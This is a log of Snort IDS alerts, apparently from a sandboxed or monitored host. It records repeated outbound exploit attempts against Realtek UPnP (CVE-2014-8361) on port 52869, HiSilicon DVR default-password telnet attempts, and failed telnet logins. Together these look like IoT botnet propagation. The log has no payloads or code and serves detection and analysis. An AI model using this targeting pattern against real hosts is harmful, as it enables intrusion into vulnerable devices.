Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:47690 -> 45.41.92.119:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:54774 -> 185.185.134.181:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:56240 -> 185.147.56.63:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:56240 -> 185.147.56.63:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:60272 -> 185.241.255.123:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:60272 -> 185.241.255.123:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:56246 -> 185.147.56.63:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:60278 -> 185.241.255.123:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:49904 -> 45.250.173.50:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:49904 -> 45.250.173.50:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:58592 -> 91.76.233.152:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:58592 -> 91.76.233.152:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:58596 -> 91.76.233.152:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:56418 -> 45.33.255.24:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:56418 -> 45.33.255.24:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:33638 -> 45.33.242.207:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:33638 -> 45.33.242.207:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:43762 -> 185.113.135.221:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:43762 -> 185.113.135.221:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:43766 -> 185.113.135.221:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:46704 -> 45.248.69.125:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:46704 -> 45.248.69.125:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:48670 -> 45.158.23.166:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:48670 -> 45.158.23.166:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:48026 -> 45.125.109.247:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:48026 -> 45.125.109.247:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:55658 -> 185.242.233.39:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:55658 -> 185.242.233.39:52869
Source: Traffic	Snort IDS: 716 INFO TELNET access 61.8.67.30:23 -> 192.168.2.23:54060
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:55670 -> 185.242.233.39:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:60348 -> 45.250.173.24:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:60348 -> 45.250.173.24:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:37774 -> 91.76.161.99:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:37774 -> 91.76.161.99:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:37778 -> 91.76.161.99:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:53548 -> 45.33.242.251:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:53548 -> 45.33.242.251:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:51568 -> 91.76.226.212:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:51568 -> 91.76.226.212:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:51572 -> 91.76.226.212:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:46800 -> 45.61.55.221:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:46800 -> 45.61.55.221:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:48288 -> 45.42.86.66:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:48288 -> 45.42.86.66:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:42888 -> 45.121.58.125:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:42888 -> 45.121.58.125:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:53084 -> 45.113.1.179:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:53084 -> 45.113.1.179:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:34198 -> 45.207.218.85:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:34198 -> 45.207.218.85:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:46808 -> 45.61.55.221:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:52838 -> 45.115.239.17:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:52838 -> 45.115.239.17:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:47724 -> 91.188.108.123:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:47724 -> 91.188.108.123:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:47728 -> 91.188.108.123:52869
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 114.26.113.229:23 -> 192.168.2.23:34250
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 114.26.113.229:23 -> 192.168.2.23:34250
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:39946 -> 185.113.135.58:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:39946 -> 185.113.135.58:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:39962 -> 185.113.135.58:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:58284 -> 45.41.81.66:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:58284 -> 45.41.81.66:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:52840 -> 45.115.236.170:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:52840 -> 45.115.236.170:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:44302 -> 45.158.21.175:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:44302 -> 45.158.21.175:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:54444 -> 185.133.76.104:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:54444 -> 185.133.76.104:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:41320 -> 185.215.44.41:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:41320 -> 185.215.44.41:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:36982 -> 45.152.216.243:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:36982 -> 45.152.216.243:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:41384 -> 185.216.250.252:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:41384 -> 185.216.250.252:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:54170 -> 185.154.168.42:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:54170 -> 185.154.168.42:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:41348 -> 185.215.44.41:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:54186 -> 185.154.168.42:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:57432 -> 185.107.66.97:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:57432 -> 185.107.66.97:52869
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 218.161.54.12:23 -> 192.168.2.23:43576
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 218.161.54.12:23 -> 192.168.2.23:43576
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:57462 -> 185.107.66.97:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:46598 -> 91.78.80.183:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:46598 -> 91.78.80.183:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:46606 -> 91.78.80.183:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:56376 -> 185.71.65.41:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:56376 -> 185.71.65.41:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:56382 -> 185.71.65.41:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:40286 -> 45.121.83.169:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:40286 -> 45.121.83.169:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:37674 -> 45.207.218.43:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:37674 -> 45.207.218.43:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:37688 -> 45.207.218.43:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:36518 -> 45.120.185.107:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:36518 -> 45.120.185.107:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:36528 -> 45.120.185.107:52869
Source: Traffic	Snort IDS: 2027973 ET EXPLOIT HiSilicon DVR - Default Telnet Root Password Inbound 192.168.2.23:52726 -> 181.16.108.147:23
Source: Traffic	Snort IDS: 2027973 ET EXPLOIT HiSilicon DVR - Default Telnet Root Password Inbound 192.168.2.23:50352 -> 41.137.136.225:23
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:46018 -> 91.78.57.129:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:46018 -> 91.78.57.129:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:46020 -> 91.78.57.129:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:59968 -> 45.33.251.199:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:59968 -> 45.33.251.199:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:43896 -> 185.245.181.72:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:43896 -> 185.245.181.72:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:34752 -> 45.195.156.16:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:34752 -> 45.195.156.16:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:43902 -> 185.245.181.72:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:41286 -> 45.127.160.143:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:41286 -> 45.127.160.143:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:34766 -> 45.195.156.16:52869
Source: Traffic	Snort IDS: 492 INFO TELNET login failed 186.220.230.105:23 -> 192.168.2.23:37388
Source: Traffic	Snort IDS: 2027973 ET EXPLOIT HiSilicon DVR - Default Telnet Root Password Inbound 192.168.2.23:42884 -> 122.154.150.110:23
Source: Traffic	Snort IDS: 492 INFO TELNET login failed 78.108.27.235:23 -> 192.168.2.23:36012
Source: Traffic	Snort IDS: 2027973 ET EXPLOIT HiSilicon DVR - Default Telnet Root Password Inbound 192.168.2.23:37452 -> 186.220.230.105:23
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:45156 -> 185.216.249.106:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:45156 -> 185.216.249.106:52869
Source: Traffic	Snort IDS: 492 INFO TELNET login failed 186.220.230.105:23 -> 192.168.2.23:37452
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:53616 -> 45.195.159.187:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:53616 -> 45.195.159.187:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:44178 -> 185.154.168.49:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:44178 -> 185.154.168.49:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:53628 -> 45.195.159.187:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:44184 -> 185.154.168.49:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:55070 -> 185.81.202.9:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:55070 -> 185.81.202.9:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:55076 -> 185.81.202.9:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:43922 -> 185.235.183.0:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:43922 -> 185.235.183.0:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:43926 -> 185.235.183.0:52869
Source: Traffic	Snort IDS: 2027973 ET EXPLOIT HiSilicon DVR - Default Telnet Root Password Inbound 192.168.2.23:43902 -> 218.161.54.12:23
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:54430 -> 45.43.224.117:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:54430 -> 45.43.224.117:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:48194 -> 45.142.152.233:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:48194 -> 45.142.152.233:52869
Source: Traffic	Snort IDS: 716 INFO TELNET access 212.39.124.177:23 -> 192.168.2.23:35006
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:60268 -> 185.216.249.21:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:60268 -> 185.216.249.21:52869
Source: Traffic	Snort IDS: 492 INFO TELNET login failed 186.220.230.105:23 -> 192.168.2.23:37544
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:49204 -> 185.113.135.44:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:49204 -> 185.113.135.44:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:49212 -> 185.113.135.44:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:58322 -> 45.113.0.100:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:58322 -> 45.113.0.100:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:58332 -> 45.113.0.100:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:33408 -> 91.78.110.241:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:33408 -> 91.78.110.241:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:33414 -> 91.78.110.241:52869
Source: Traffic	Snort IDS: 716 INFO TELNET access 201.211.209.224:23 -> 192.168.2.23:38010
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 218.161.54.12:23 -> 192.168.2.23:43902
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 218.161.54.12:23 -> 192.168.2.23:43902
Source: Traffic	Snort IDS: 492 INFO TELNET login failed 186.220.230.105:23 -> 192.168.2.23:37676
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:42514 -> 45.158.21.144:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:42514 -> 45.158.21.144:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:47872 -> 45.33.250.143:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:47872 -> 45.33.250.143:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:38618 -> 91.77.125.49:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:38618 -> 91.77.125.49:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:44688 -> 91.78.83.171:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:44688 -> 91.78.83.171:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:44694 -> 91.78.83.171:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:38624 -> 91.77.125.49:52869
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 66.210.126.228:23 -> 192.168.2.23:32836
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 66.210.126.228:23 -> 192.168.2.23:32836
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:36720 -> 45.33.248.233:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:36720 -> 45.33.248.233:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:45460 -> 45.127.162.99:52869
